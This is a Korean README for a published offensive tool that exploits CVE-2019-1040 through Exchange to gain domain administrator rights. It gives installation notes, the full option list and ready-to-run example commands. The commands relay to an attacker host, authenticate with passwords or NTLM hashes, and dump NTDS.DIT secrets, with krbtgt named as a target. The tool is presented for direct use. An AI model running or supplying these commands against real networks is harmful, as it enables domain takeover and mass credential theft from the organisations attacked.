
Exchange와 함께하는 CVE-2019-1040
훌륭한 글입니다! CVE-2019-1040 악용 - 릴레이 취약점을 결합한 RCE 및 도메인 관리자 권한 획득 .
그래서, 저는 쉽게 사용할 수 있도록 CVE-2019-1040.py를 작성했습니다.
또한 제 exchange2domain 저장소를 확인해보세요: https://github.com/ridter/exchange2domain, Exchange를 사용하여 DC를 획득하는 또 다른 방법입니다.
이 도구는 impacket이 필요합니다. pip를 사용하여 pip install impacket으로 설치할 수 있습니다.
usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
[--hashes HASHES] [--smb-port [destination port]] -ah
ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
[-t TIMEOUT]
[--exec-method [{smbexec,wmiexec,mmcexec}]]
[--just-dc-user USERNAME] [--debug]
EX_HOSTNAME
CVE-2019-1040 with Exchange
positional arguments:
EX_HOSTNAME Exchange 서버의 호스트명/IP
optional arguments:
-h, --help 이 도움말 메시지를 표시하고 종료
-u USERNAME, --user USERNAME
인증에 사용할 사용자 이름
-d DOMAIN, --domain DOMAIN
사용자가 속한 도메인 (FQDN 또는 NETBIOS 도메인 이름)
-p PASSWORD, --password PASSWORD
인증용 비밀번호, 지정하지 않고 NT:NTLM 해시가 제공되지 않으면
입력 프롬프트가 표시됨
--hashes HASHES LM:NLTM 해시
--smb-port [destination port]
SMB 서버에 연결할 대상 포트
-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
공격자 호스트명 또는 IP
-th TARGET_HOST, --target-host TARGET_HOST
DC의 호스트명 또는 IP
-t TIMEOUT, --timeout TIMEOUT
시간 제한(초)
--exec-method [{smbexec,wmiexec,mmcexec}]
대상에서 사용할 원격 실행 방법 (--use-vss 사용 시에만). 기본값: smbexec
--just-dc-user USERNAME
지정된 사용자의 NTDS.DIT 데이터만 추출. DRSUAPI 접근 방식에서만 사용 가능.
--debug 디버그 출력 활성화
예시:
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip
krbtgt만 덤프하려면 --just-dc-user를 사용하세요.
예시:
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt
